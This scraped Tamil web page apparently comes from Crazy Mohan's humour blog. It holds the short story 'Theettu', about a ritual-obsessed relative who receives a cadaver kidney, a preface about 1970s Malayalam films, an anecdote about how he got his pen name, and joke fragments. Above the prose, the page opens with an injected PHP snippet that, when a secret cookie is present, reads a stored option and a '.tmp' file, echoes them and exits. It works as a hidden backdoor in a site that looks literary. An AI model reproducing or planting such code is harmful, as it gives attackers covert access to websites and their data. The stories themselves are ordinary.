if (isset($_COOKIE["uJGSx2L7eLdQEgkErMeRTSpqI7NNvPMOVGW9b7cWTz6ZT2Ozw6XjIXnxYkrPQ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } » Short Story

Short Story


தீட்டு

மை”LOVE”வாப்பூர் டைம்ஸ்ஸுக்காக நெட்-ப்ராக்டீஸ்”….ஓகேயா படித்துச் சொல்லவும் ப்ளீஸ்….கிரேசி மோகன்….

”முன்கதை சுருக்கம்”
————————————-

70துகளில் என்று நினைக்கிறேன்….ஜெத்-நகரில் இருக்கும், எனக்கு ஹாஸ்யம் சொல்லிக் கொடுத்த பால்ய நண்பன் ராம்னாத் வீட்டில் அவனோடு கம்பைண்ட்-ஸ்டடி செய்துவிட்டு இரவு அவன் வீட்டிலேயே படுத்துக் கொள்வதாக பாட்டியிடம் பொய் சொல்லிவிட்டு, அவனோடு அவன் ஜாவாவில் ”அவளோட ராவுகள்” , ”மாமனாரின் இன்பவெறி” போன்ற மலையாளப் படங்கள் பார்க்க ந்யு-எலிபெண்ட்ஸ்டைன் தியேட்டருக்கு செல்வேன்….அப்படிப் பார்த்த பலான படங்களுக்கு பலனாக சில அருமையான மலையாளப் படங்களும் பார்த்ததுண்டு….அப்படிப் பார்த்த படம்தான்(பெயர் நினைவில்லை….மனசுல ஆயலாயி)….அந்தப் படத்தில் கே.பி.கொட்டாரக்கரா, ஓங்கி உலகளந்த உத்தமன் BARE-BODYயாக, பஞ்சகச்சத்தில் சந்தனக் காப்புடன் சாஸ்திரோத்தமான அந்தணராக வருவார்….அவர் அடிக்கடி சொல்லும் வசனம் ”நான் அந்தணனாய்ப் பிறந்தேன்…அந்தணனாய் வாழ்ந்தேன்…அந்தணனாய்த்தான் சாவேன்”….இந்த பஞ்ச் டயலாக்கை , அவரது ஆசாரத்திற்கு இடைஞ்சல் வரும் நேரங்களில் ஆடியன்ஸைப் பார்த்து காத்திரமாகக் கூறிவிட்டு, ஈயச் சொம்போடு புழையில் ஸ்னானம் செய்ய ரெண்டு ரீல் முடியும் வரை நிதானமாக நடந்து செல்வார்(அவர் குளத்தில் குளித்து முடிப்பதற்குள் நானும், ராம்னாத்தும்”ஜாஃபர்ஸ்” ஐஸ்கிரீம் ஷாப்பில் ஃபலூடா சாப்பிட்டுவிட்டு வருவோம்)….நாங்கள் வந்த பிறகு, ”வந்தாச்சா !” என்பதை ஸ்கிரீனிலிருந்தே பார்த்து ஊர்ஜிதம் செய்து கொண்டு கொட்டாரக்கா ”யான் ப்ராமணனாய் ஜீவிச்சு…ப்ராமணனாய் மரிச்சு” என்ற பஞ்ச் டயலாக்கை சொல்லுவார்….இந்த சினிமாவில் ஆடியன்ஸ் நினைத்த போது ”இடைவேளை” எடுத்துக் கொள்வார்கள்….அவர்கள் எவ்வளவு நேரம் கழித்து திரும்பினாலும் ”கொட்டாரக்காரா” தனது ”பஞ்ச் டலாக்கைத்தான்” சொல்லிக்கொண்டிருப்பார்….வெளியே சென்றவர்களுக்கு பெரிய இழப்பு இல்லை…கடைசி காட்சியில் அவர் இறந்தவுடன் அவரது உடலை நாலு பேர் தூக்கிச் செல்வார்கள்….அந்த நான்கு பேரும் அந்தணர் அல்லாதவர்கள்….இறுதி யாத்திரை இரண்டு ரீலுக்கு நீளும்….அவார்டுக்காக எடுக்கப் பட்ட படம் போலிருக்கு….நத்தை ஓவர்டேக் செய்யும் வேகம்….அப்போது அசரீரியாக கொட்டாரக்கராவின் பஞ்ச் டயலாக் ஒலிக்கும்….அவர் மட்டும் சாகவில்லை, அவரோடு அவர் கொள்கையும் சாவதைக் காட்டும் அந்த IRONY OF LIFE கண்டு ஆடியன்ஸ் கையடிப்பார்கள்(மலையாளத்தில் அப்பளாஸ்)….இந்த ஒரு TWIST IN THE TALEலுக்காக 15 ரீலுக்குமேல் அந்தப் படம் ஊறும்….

முன்கதை சுருக்கத்திற்கு பின் குறிப்பு- இந்தப் படம் பார்த்து விட்டு நானும் ராம்னாத்தும் ஜாவா மோட்டார் பைக்கில் வந்த போது கற்பகம் மெஸ் அடை-அவியல் மழை….தொப்பமாக நனைந்தேன்….போட்டிருந்த பேண்ட்-சொக்காய் தானாய் உலற ஒருவாரம் பிடிக்கும்….கம்பைண்ட் ஸ்டடி ராம்னாத்துடன்(இவனுக்கு தெரிந்த OHMS-LAW கபாலி கோயில் ஓம்ஸ்லாதான் என்பது என் பாட்டிக்கு தெரியாது) செய்துவிட்டு அவன் வீட்டிலேயே தூங்குவதாக பொய் சொன்ன வாய்க்கு பாட்டியின் போஜனம் கிடைக்காது…அதனால் , என்னை அண்டர்வேரில் நிற்கவைத்து எனது பேண்ட்-ஷர்ட்டில் உள்ள ஈரம் போகும் வரை ராம்னாத் சுடச்சுட இஸ்திரி செய்து தருவான் விடியவிடிய….

தீட்டு
———-

கொட்டாரக்கராவின் கதையை நினைத்துப் பார்த்த போது அடியேனுக்கு தோன்றிய சிறு கதைதான் ”தீட்டு”….எனக்கு ஒரு ஒண்ணுவிட்ட மாமா இருந்தார்….மாடிப் படியை ஒண்ணுவிட்டு ஒண்ணுவிட்டு தாவி வேகமா ஏறினதுல மண்டைல அடிப்பட்டு, சேத்துப்புண், நகச்சுத்தி இப்படி பல வியாதிகள் வந்து இறுதியாக ”கிட்னி-ஃபெயிலியரில்” இறந்தார்….அவர் பெயரை கொட்டாரக்காரா என்றே வைத்துக் கொள்வோம்….இவரும் மைலாப்பூர்தான் என்று ஊரைச் சொன்னாலும் இவரது பேரைச் சொல்லமாட்டேன்….இவர் பேர் சொல்லும் வாரிசுகள் இருப்பதால்….ரொம்ப ஆசார சீலர்…இவர் எதிரில் ”நகத்தைக் கடிக்கக் கூடாது, எச்சை பண்ணக் கூடாது, எதிர்த்து பேசக் கூடாது….இப்படி பல கூடாதுகள் இவர் அகராதியில் உண்டு(சாப்பிடலாம் அதுவும் இடது கையால் அப்பளத்தை எடுத்தால், இடது கை அப்பளமாய் நொறுங்கி விடும்….தூங்கலாம், ஆனால் புரளக் கூடாது….மீறி புரண்டால் மாடியிலிருந்து உருட்டி விட்டு விடுவார், தெருவில் புரளும் அளவுக்கு)….துக்கம் விசாரிக்கமாட்டார்…,”தீட்டு” இந்தக் கொட்டாரக்கராவின் பஞ்ச் டயலாக்….எறும்பு இழுத்துக் கொண்டு போகும் அளவுக்கு இவருக்கு உடம்பில் ”சுகர்”….அதானால் ”கிட்னி-ஃபெயிலியர்”….மாற்று சிறுநீரகம்(KIDNEY TRANSPALANT) பொருத்தப்பட்டு ஆப்பரேஷன் தியேட்டரிலிருந்து வந்தவர் சுய நினைவு திரும்பியதும் கேட்ட முதல் கேள்வி ”யார்டா எனக்கு கிட்னி கொடுத்தது”….யாரும் பதில் சொல்லவில்லை….காரணம் இறந்தவரின் கிட்னி(CADAVER KIDNEY) இவருக்கு பொருத்தப் பட்டு இருந்தது….அந்தத் ”தீட்டோடு” இந்த கொட்டாரக்கா மேலும் 6 ரீல்கள் வாழ்ந்தார்….

கருத்து- ஸ்ரீவத்ஸ ஜெயராம சர்மா சொல்லுவார் ப்ரவசனத்தில்….அனுஷ்டானங்களில் ”நெறி” இருக்கலாம்….ஆனால் அந்த ”நெறி” ”வெறி” ஆகக் கூடாதென்று….
—————————————————————————————————————————-

Comment...

 


KK4
KK4
KK4

Comment...

 


’’கிரேசி தீவ்ஸ் இன் பாலவாக்கம்’’ நாடகத்தில் என் பெயர் ர.மோகன் என்றுதான் அறிவிக்கப்படும்….அந்த சமயத்தில்(1975 என்று நினைவு) ஆனந்த விகடன் ஆசிரியர் வீயெஸ்வி ஒரு குட்டி நாடகம் எழுதித் தருமாறு கேட்டார்….முதன்முதலில் பத்திரிகையில் வந்த அடியேனின் சிறு நாடகம் ‘’கலிகால கரிகாலன்’’….நம் எழுத்து பத்திரிகையில் பார்க்கும் ஆர்வத்தில் அந்த வெள்ளிக்கிழமை கடைக்குச் சென்று ஆனந்த விகடன் வாங்கிப் பார்த்தால் அதில் ர(ர பாஃர் ரஙாச்சாரி)மோகன் கிரேசி மோகன் என்று போடப்பட்டிருந்தது….ஆக எனக்கு வீட்டுத் தாத்தா வைத்த பெயர் ர.மோகன்….விகடன் தாத்தா வைத்த பெயர் கிரேசி மோகன்….அடைமொழியை வார்த்துப் போட்டது ஆனந்த விகடன் ஆசிரியர் ‘’வீயெஸ்வி’’….என்னை கிரேசியாக்கிய இந்த சிறு நாடகம் பிற்காலத்தில்(80துகளில்) ‘’ஜூனியர் விகடனில்’’ அடியேன் ஆடிய ‘’கே.பி.டி சிரிப்பு ராஜன்’’ என்ற 5 நாள் மேட்ச்சுக்கு நெட்-ப்ராக்டீஸாக அமைந்தது….

KK KK.2 KK3 KK4

Comment...

 


“தலை தீபாவளிக்கு வரும நாச்சாமியே வருக வருக…!”

Comment...

 


கொடிது! கொடிது என வறுமை வர்ணிக்க ஆரம்பித்து அவ்வையார ஒருவேளை நமது கதாநாயகன் வரதராஜனை பார்க்கும பட்சத்தில் தன்னை சுதாரித்துக் கொண்டு, “கொடிது கொடிது வறுமை கொடிது.. அதனினும் கொடிது வரதராஜனின் வாலிப வழுக்கை” என்று அவசர அவசரமாகப் பாடி முடித்திருப்பாள்

Comment...